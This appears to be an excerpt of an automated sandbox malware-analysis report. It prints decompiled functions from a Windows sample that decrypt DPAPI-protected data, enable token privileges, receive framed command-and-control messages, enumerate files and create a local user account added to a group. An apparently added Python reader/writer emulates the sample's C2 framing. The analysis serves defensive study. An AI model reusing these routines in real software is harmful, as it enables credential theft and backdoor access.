                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 02D1B1A9
                                                                      • Part of subcall function 02D15EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 02D1B1F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                                    • String ID:
                                                                    • API String ID: 573875632-0
                                                                    • Opcode ID: fbcc8ccc535ef9c81bde0395f6803ac7638555b5f641568fe2ac124f058c5bad
                                                                    • Instruction ID: b801ba4b5c09b92c0fc55dc5e5a7d7737f8513a9f7fcef7aaada5bf5935f22c2
                                                                    • Opcode Fuzzy Hash: fbcc8ccc535ef9c81bde0395f6803ac7638555b5f641568fe2ac124f058c5bad
                                                                    • Instruction Fuzzy Hash: 9811D6B6D0020DAFCB11DF94D8849EEBBBDEF58344F10456AE909A3200D7359E55CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 60%
                                                                    			/* Enables the privilege named by *__edx on the access token of process handle __ecx.
                                                                    			   0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY; attribute 2 = SE_PRIVILEGE_ENABLED.
                                                                    			   Returns 1 on success, 0 if any of the three API calls fails. */
                                                                    			E02D1F619(void* __ecx, WCHAR** __edx) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				struct _LUID _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				struct _TOKEN_PRIVILEGES _v36;
                                                                    				struct _TOKEN_PRIVILEGES _v52;
                                                                    				WCHAR** _t33;
                                                                    
                                                                    				asm("stosd");
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v8 = 0;
                                                                    				_t33 = __edx;
                                                                    				asm("movlpd [ebp-0x10], xmm0");
                                                                    				_v12 = 0;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
                                                                    					L4:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_v36.Privileges = _v20.LowPart;   /* Privileges[0].Luid = looked-up LUID */
                                                                    					_v28 = _v20.HighPart;
                                                                    					_v36.PrivilegeCount = 1;
                                                                    					_v24 = 2;                         /* Privileges[0].Attributes = SE_PRIVILEGE_ENABLED */
                                                                    					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
                                                                    						goto L4;
                                                                    					}
                                                                    					return 1;
                                                                    				}
                                                                    			}
                                                                    0x02d1f627
                                                                    0x02d1f62a
                                                                    0x02d1f62d
                                                                    0x02d1f630
                                                                    0x02d1f632
                                                                    0x02d1f637
                                                                    0x02d1f63a
                                                                    0x02d1f63b
                                                                    0x02d1f63c
                                                                    0x02d1f64c
                                                                    0x02d1f698
                                                                    0x00000000
                                                                    0x02d1f65f
                                                                    0x02d1f665
                                                                    0x02d1f66e
                                                                    0x02d1f678
                                                                    0x02d1f683
                                                                    0x02d1f692
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f694

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,02D1E18E), ref: 02D1F644
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 02D1F655
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 02D1F68A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                                    • String ID:
                                                                    • API String ID: 658607936-0
                                                                    • Opcode ID: 6276d526daf2ce481985b7a94cd8e086053ef3fd75d7050b23eb3dead10f2f38
                                                                    • Instruction ID: 1bd4177fe41836c07d44aa30f3c6fd0c0e8adc6d6dfd35c6386098d5b1a07ccc
                                                                    • Opcode Fuzzy Hash: 6276d526daf2ce481985b7a94cd8e086053ef3fd75d7050b23eb3dead10f2f38
                                                                    • Instruction Fuzzy Hash: 3511DD75E10219BFEB11CFA5DD449EFF7BCFB48644F10492AE901F2650E7709A449BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			/* DPAPI wrapper: CryptUnprotectData on the input blob {cbData = __edx, pbData = __ecx}
                                                                    			   with an empty entropy blob and flags _a20. On success the plaintext length is
                                                                    			   stored in *_a28 and a LocalAlloc(LPTR) copy of the plaintext in *_a24; the
                                                                    			   DPAPI-owned output buffer (_v8) is then released with LocalFree. */
                                                                    			E02D1CAFC(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				intOrPtr _v24;
                                                                    				char _v28;
                                                                    				char* _t16;
                                                                    				void* _t18;
                                                                    				long _t23;
                                                                    				char* _t26;
                                                                    				long* _t27;   /* declaration missing in the decompiler output; holds _a28 */
                                                                    
                                                                    				_v24 = __ecx;
                                                                    				_v28 = __edx;
                                                                    				_v20 = 0;                                        /* entropy blob: cbData = 0 */
                                                                    				_t16 =  &_v28;
                                                                    				_v16 = 0;                                        /* entropy blob: pbData = NULL */
                                                                    				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12);
                                                                    				_t26 = _t16;                                     /* _t16 is reused for the BOOL result (eax) */
                                                                    				if(_t26 != 0) {
                                                                    					_t23 = _v12;                                 /* output blob: cbData */
                                                                    					_t27 = _a28;
                                                                    					 *_a28 = _t23;
                                                                    					_t18 = LocalAlloc(0x40, _t23);               /* 0x40 = LPTR (fixed, zero-initialised) */
                                                                    					 *_a24 = _t18;
                                                                    					if(_t18 != 0) {
                                                                    						E02D1102C(_t18, _v8,  *_t27);            /* copy plaintext (_v8 = output blob pbData) */
                                                                    					}
                                                                    					LocalFree(_v8);
                                                                    				}
                                                                    				return _t26;
                                                                    			}
                                                                    0x02d1cb07
                                                                    0x02d1cb10
                                                                    0x02d1cb18
                                                                    0x02d1cb1d
                                                                    0x02d1cb20
                                                                    0x02d1cb24
                                                                    0x02d1cb2a
                                                                    0x02d1cb2e
                                                                    0x02d1cb30
                                                                    0x02d1cb33
                                                                    0x02d1cb39
                                                                    0x02d1cb3b
                                                                    0x02d1cb44
                                                                    0x02d1cb48
                                                                    0x02d1cb50
                                                                    0x02d1cb55
                                                                    0x02d1cb5b
                                                                    0x02d1cb5b
                                                                    0x02d1cb66

APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 02D1CB24
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,02D1CAD5,?,00000000,?,?,?,?,02D1CA44), ref: 02D1CB3B
• LocalFree.KERNEL32(02D1CAD5,?,?,?,?,?,02D1CAD5,?,00000000,?,?,?,?,02D1CA44), ref: 02D1CB5B
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Opcode ID: 7b029f0a25001e512dd3abfa5dc25ca81007bff70380ebcfe2f4c8814acb50fe
• Instruction ID: f43bc126973a2c36dcbfb9f262bbce4b957b63deff8eb40fb94881a583878fbe
• Opcode Fuzzy Hash: 7b029f0a25001e512dd3abfa5dc25ca81007bff70380ebcfe2f4c8814acb50fe
• Instruction Fuzzy Hash: 810108B9D40219AFDB159FA4DD0A8AEBBB9EF58211F10056AED41A2340E7719E14CAA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadResource.KERNEL32(?,?,?,?,00402F3C,00000000,00000000,?), ref: 0040675A
• LockResource.KERNEL32(00000000,?,?,00402F3C,00000000,00000000,?), ref: 00406765
• SizeofResource.KERNEL32(?,?,?,?,00402F3C,00000000,00000000,?), ref: 00406777
Memory Dump Source
• Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Resource$LoadLockSizeof
• String ID:
• API String ID: 2853612939-0
• Opcode ID: c6e0ba34dba859eb0b8b5e3138f23bf24e73977bfbefe1b4d9aeda50dd6975e8
• Instruction ID: c06dce4dc857c0e570c8498c03582b8fa6d5feab43adc6a9aec76e99dee71805
• Opcode Fuzzy Hash: c6e0ba34dba859eb0b8b5e3138f23bf24e73977bfbefe1b4d9aeda50dd6975e8
• Instruction Fuzzy Hash: C6F028369002299FCF315F64DC044AA7BA4EB847553038836FD0FB3150E639DC6087C4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,0040C40D,00000000,00000000,?,00000000,?,0040E3E2), ref: 0040C430
• TerminateProcess.KERNEL32(00000000,?,0040C40D,00000000,00000000,?,00000000,?,0040E3E2), ref: 0040C437
• ExitProcess.KERNEL32 ref: 0040C449
Memory Dump Source
• Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 042ef01185758883035417fadbcf2aea06edea07491480b2c52b3dd25f90e22b
• Instruction ID: 2ee7d6a30e1c9f2ea0b7c0948b6f3c6d58c915f4f7fb98a82b557b981973ad99
• Opcode Fuzzy Hash: 042ef01185758883035417fadbcf2aea06edea07491480b2c52b3dd25f90e22b
• Instruction Fuzzy Hash: 96E0B631410608EFCF126B65DC699A93B69FB41341B548539F805A6272CB3DED82DA98
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 4614c3ac16b0df14dcfa035dcd81d49b6d282607c3f7d11ebf436ff1b6696e4c
• Instruction ID: 113bd5d612662efda5db9b2d70b720d05c4466db24c2acdae4581605959f948c
• Opcode Fuzzy Hash: 4614c3ac16b0df14dcfa035dcd81d49b6d282607c3f7d11ebf436ff1b6696e4c
• Instruction Fuzzy Hash: 9C3137719001086FDB24DE69CC84EFB776EDF45318F1401BEE509A7692E638AD498B94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%
			// Receives one framed message from the socket kept in the global at 0x2d298b4 and
			// fills the 12-byte record *_a4 with { first header dword, second header dword
			// (used as the payload length), pointer to the payload buffer }.
			// __imp__#16 is WS2_32 ordinal 16, recv (see the APIs list below).  E02D11085 is
			// the heap-allocation helper (GetProcessHeap + RtlAllocateHeap, per the APIs list),
			// E02D1102C is used as memcpy(dst, src, len), and E02D11099, called on the scratch
			// buffer before the normal return, is presumably the matching free.
			E02D1F23D(signed int* _a4) {
				signed int _v8;            // payload buffer (0x2000 bytes), returned to the caller
				signed int _v12;           // second header dword: payload length
				intOrPtr _v16;             // socket
				signed int _v20;           // first header dword
				intOrPtr _t26;
				void* _t28;
				void* _t30;
				signed int* _t31;
				signed int _t39;
				signed int* _t42;
				void* _t44;                // scratch receive buffer (0x2000 bytes)
				void* _t54;                // header bytes collected so far
				signed int _t55;           // used below; missing from the decompiler's declarations
				void* _t56;                // payload bytes collected so far
				signed int* _t58;          // = _a4, the output record
				void* _t59;
				void* _t60;

				_t26 =  *0x2d298b4; // 0x0
				_v16 = _t26;                           // socket handle held in a global
				_v8 = E02D11085(0x2000);               // payload buffer
				_t28 = E02D11085(0x2000);
				_t58 = _a4;
				_t44 = _t28;                           // scratch buffer handed to recv
				_v20 = _v20 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				asm("stosd");                          // three stosd: most likely zero the 12-byte
				asm("stosd");                          // output record (the decompiler could not
				asm("stosd");                          // render the register setup)
				_t54 = 0;
				while(1) {                             // phase 1: collect exactly 8 header bytes
					_t30 = 8;
					_t31 = _t30 - _t54;                // bytes still missing from the header
					__imp__#16(_v16, _t44, _t31, 0);   // recv(sock, scratch, missing, 0)
					_a4 = _t31;                        // _a4 is reused to hold recv's return value
					if(_t31 == 0 || _t31 == 0xffffffff) {   // 0 = peer closed, -1 = SOCKET_ERROR
						break;
					}
					E02D1102C(_v8 + _t54, _t44, _t31); // append the received bytes
					_t54 = _t54 + _a4;
					_t59 = _t59 + 0xc;
					if(_t54 < 8) {
						continue;
					} else {
						_t55 = _v8;
						E02D1102C( &_v20, _v8, 4);         // header dword 0
						E02D1102C( &_v12, _t55 + 4, 4);    // header dword 1: payload length
						_t39 = _v12;
						_t60 = _t59 + 0x18;
						_t56 = 0;
						if(_t39 <= 0) {                    // signed compare: 0 or >= 0x80000000 means no payload
							L8:
							_t58[1] = _t39;                // record.length
							 *_t58 = _v20;                 // record.dword0
							_t58[2] = _v8;                 // record.payload (the caller keeps this buffer)
							E02D11099(_t44);               // release the scratch buffer
						} else {
							while(1) {                     // phase 2: collect `length` payload bytes
								_t42 = _t39 - _t56;        // still missing; passed straight to recv. No
								                           // comparison of the length against the 0x2000
								                           // allocations appears anywhere in this listing.
								__imp__#16(_v16, _t44, _t42, 0);
								_a4 = _t42;
								if(_t42 == 0 || _t42 == 0xffffffff) {
									goto L9;               // connection dropped mid-payload
								}
								E02D1102C(_v8 + _t56, _t44, _t42);
								_t56 = _t56 + _a4;
								_t60 = _t60 + 0xc;
								_t39 = _v12;
								if(_t56 < _t39) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							break;
						}
					}
					L10:
					return _t58;
				}
				L9:
				 *0x2d29695 = 0;                       // recv failed: clear a global flag; the record is
				goto L10;                              // not filled and neither buffer is freed on this path
			}

APIs
  • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
  • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
• recv.WS2_32(?,00000000,00000008,00000000), ref: 02D1F286
• recv.WS2_32(?,00000000,00000000,00000000), ref: 02D1F2EB
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Heaprecv$AllocateProcess
• String ID:
• API String ID: 3872517900-0
• Opcode ID: 6dcd16d9dafdc28eb318558ffe5b045bc8bb3aa85e18b147d6eb2292a5f6024b
• Instruction ID: bcd5a64e95d9b487e479081f487145b6d574511b611dbe0557adbdd7850e2f34
• Opcode Fuzzy Hash: 6dcd16d9dafdc28eb318558ffe5b045bc8bb3aa85e18b147d6eb2292a5f6024b
• Instruction Fuzzy Hash: 053192B1E00209BFEB209BB8EC44B9E7BA9EF44354F244515E658E7790D734DE40CBA0
Uniqueness

Uniqueness Score: -1.00%

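The framing that E02D1F23D reads (an 8-byte header of two dwords, the second giving how many payload bytes follow, both collected across short reads), restated as a Python reader and writer so it can be exercised offline, for example against a stream carved out of a capture or inside a C2 emulator. This is an added example, not code from the report or from the sample. Assumptions, also marked in the code: the header dwords are decoded little-endian in listing order (the sample memcpy's them into locals on x86 and shows no byte swap); they are named cmd and length purely from how E02D1F23D uses them; FakeSocket is a constructed stand-in that delivers bytes in arbitrary chunk sizes, which is exactly what the accumulation loops in both recv phases exist to handle. One deliberate difference from the sample: a length larger than the 0x2000 receive buffer is refused here instead of being passed to recv.

```python
"""Reader/writer for the 8-byte-header framing seen in E02D1F23D.

Added example; not code from the report or from the sample.  Assumptions:
  * header dwords are little-endian, in listing order (dword0, dword1);
  * dword0 is called `cmd` and dword1 `length` purely from how E02D1F23D
    uses them (only dword1 drives the second recv loop).
"""
import struct

HEADER_LEN = 8        # phase 1 of E02D1F23D stops once 8 bytes have arrived
BUF_SIZE = 0x2000     # size passed to the heap-allocation helper E02D11085


class FakeSocket:
    """Constructed stand-in for a connected socket.  Delivers the given byte
    chunks one per recv() call (never more than requested), then returns
    b"" like a closed peer.  Exists so the example runs without a network."""

    def __init__(self, chunks):
        self._chunks = [bytes(c) for c in chunks]

    def recv(self, nbytes):
        if nbytes <= 0:
            raise ValueError("recv length must be positive")
        if not self._chunks:
            return b""                          # recv() == 0 in the sample
        chunk = self._chunks.pop(0)
        if len(chunk) > nbytes:                 # split like a real short read
            self._chunks.insert(0, chunk[nbytes:])
            chunk = chunk[:nbytes]
        return chunk


def recv_exact(sock, want):
    """Mirror of the two recv loops in E02D1F23D: ask for (want - have) each
    round, accumulate, and give up (None) on 0 bytes or a socket error.  The
    sample clears its global flag at 0x2d29695 at that point; here the caller
    simply gets None."""
    buf = bytearray()
    while len(buf) < want:
        try:
            chunk = sock.recv(want - len(buf))
        except OSError:                         # SOCKET_ERROR (-1) in the sample
            return None
        if not chunk:                           # peer closed
            return None
        buf += chunk
    return bytes(buf)


def read_frame(sock):
    """Return (cmd, length, payload) for one frame, or None if the
    connection dropped before the frame was complete."""
    hdr = recv_exact(sock, HEADER_LEN)
    if hdr is None:
        return None
    cmd, length = struct.unpack("<II", hdr)     # assumption: little-endian
    # The sample compares `length` as a signed int, so 0 or >= 0x80000000
    # skips the payload loop and stores the raw value.  Positive lengths go
    # straight to recv() with no check against BUF_SIZE in the listing; a
    # reimplementation should refuse them rather than mirror that.
    if length == 0 or length >= 0x80000000:
        return cmd, length, b""
    if length > BUF_SIZE:
        raise ValueError(f"length {length:#x} exceeds the {BUF_SIZE:#x} buffer")
    payload = recv_exact(sock, length)
    if payload is None:
        return None
    return cmd, length, payload


def build_frame(cmd, payload):
    """Encode a frame in the layout read_frame expects (sender side)."""
    if len(payload) > BUF_SIZE:
        raise ValueError("payload too large for the receiver's buffer")
    return struct.pack("<II", cmd, len(payload)) + bytes(payload)


if __name__ == "__main__":
    wire = build_frame(0x11, b"constructed payload")
    # Deliver the frame in awkward 5-byte pieces to exercise the short-read path.
    pieces = [wire[i:i + 5] for i in range(0, len(wire), 5)]
    print(read_frame(FakeSocket(pieces)))
```

To use this against real traffic, hand read_frame any object with a blocking recv(n) method (a socket.socket works as-is) and loop until it returns None; the sample's behaviour of leaving the output record zeroed and clearing the flag at 0x2d29695 on a dropped connection corresponds to that None.
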
C-Code - Quality: 72%
			// Enumerates every entry matching the search pattern _a4 with FindFirstFileW /
			// FindNextFileW and appends a 0x18-byte record per entry to the container at
			// _v28: { name string, nFileSizeLow, nFileSizeHigh, is-directory flag }.
			// The helper names (E02D11875, E02D11776, E02D13437, E02D135E5, E02D1362D,
			// E02D15EA5, E02D11361) are the decompiler's; the roles noted below are read
			// from how they are used here, not from their bodies.
			E02D1FF27(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;                        // temporary string built from cFileName
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;                              // result container
				signed int _v40;                        // 1 = directory, 0 = file
				intOrPtr _v44;                          // nFileSizeHigh
				intOrPtr _v48;                          // nFileSizeLow
				signed int _v56;                        // name string moved into the record
				struct _WIN32_FIND_DATAW _v648;
				signed int* _t16;                       // used below; missing from the decompiler's declarations
				intOrPtr _t39;
				void* _t62;                             // find handle
				void* _t75;
				void* _t76;                             // the record being filled
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E02D11875( &_v28, __eflags);            // initialise the container
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;               // compare against INVALID_HANDLE_VALUE
				while(_t79 != 0) {                      // first pass: handle valid; afterwards: FindNextFileW != 0
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;   // FILE_ATTRIBUTE_DIRECTORY
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;     // file: flag = 0, keep the real 64-bit size
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");        // directory: flag = 1, size fields zeroed
						_v40 = 1;                       // with an 8-byte xmm0 store
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E02D13437( &_v56, E02D135E5( &_v12,  &(_v648.cFileName)));   // string from cFileName, moved into _v56
					E02D15EA5(_v12);                    // release the temporary string
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;                 // reserve a 0x18-byte record
					_t76 = _t77;
					E02D1362D(_t76,  &_v56);            // record.name
					 *((intOrPtr*)(_t76 + 8)) = _v48;   // record.sizeLow
					 *((intOrPtr*)(_t76 + 0xc)) = _v44; // record.sizeHigh
					 *(_t76 + 0x10) = _v40;             // record.isDirectory
					E02D11776( &_v28);                  // append the record to the container
					E02D15EA5(_v56);                    // release the moved string
					__eflags = FindNextFileW(_t62,  &_v648);   // loop continues while this is nonzero
				}
				E02D11361(_t75, _t79,  &_v28);
                                                                    				_t73 = _v28;
                                                                    				if(_v28 != 0) {
                                                                    					E02D11AD5(_t73, _t73);
                                                                    				}
                                                                    				E02D15EA5(_a4);
                                                                    				return _t75;
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 02D1FF54
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 02D1FFF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 0cb732a7809ff1356e5999c785b8c6b7bdd43b3b09d6ca80a067481110f4501a
                                                                    • Instruction ID: 1625db47b4f9b40313df440330964e86a5cf5cf10254c6f2d213bb5ae30af4d3
                                                                    • Opcode Fuzzy Hash: 0cb732a7809ff1356e5999c785b8c6b7bdd43b3b09d6ca80a067481110f4501a
                                                                    • Instruction Fuzzy Hash: 2B312B71D00309ABDB14EFA4E988BEEBBB9EF58314F104559E515A3780EB749E48CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E02D1D418(char _a4, char _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v32;
                                                                    				void _v36;
                                                                    				void* _t22;
                                                                    				intOrPtr* _t25;
                                                                    				signed int _t30;
                                                                    				intOrPtr* _t38;
                                                                    
                                                                    				_t38 = _a4;
                                                                    				_t30 = 8;
                                                                    				memset( &_v36, 0, _t30 << 2);
                                                                    				_v36 =  *_t38;
                                                                    				_v24 = 1;
                                                                    				_v20 = 0;
                                                                    				_v32 =  *_a8;
                                                                    				_t22 =  &_v36;
                                                                    				_v16 = 0;
                                                                    				_v12 = 0x10201;
                                                                    				_v8 = 0;
                                                                    				__imp__NetUserAdd(0, 1, _t22, 0);
                                                                    				_t42 = _t22;
                                                                    				if(_t22 != 0) {
                                                                    					L3:
                                                                    					__eflags = 0;
                                                                    					return 0;
                                                                    				}
                                                                    				_a4 =  *_t38;
                                                                    				_t25 = E02D1F56D( &_a8, _t42);
                                                                    				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
                                                                    				E02D15EA5(_a8);
                                                                    				if(_t25 != 0) {
                                                                    					goto L3;
                                                                    				}
                                                                    				return 1;
                                                                    			}

                                                                    APIs
                                                                    • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,02E5E080,?,?,?,02D1E634,02E5E07C,02E5E080), ref: 02D1D45A
                                                                      • Part of subcall function 02D1F56D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,02D1D471,?,?,00000001), ref: 02D1F5C2
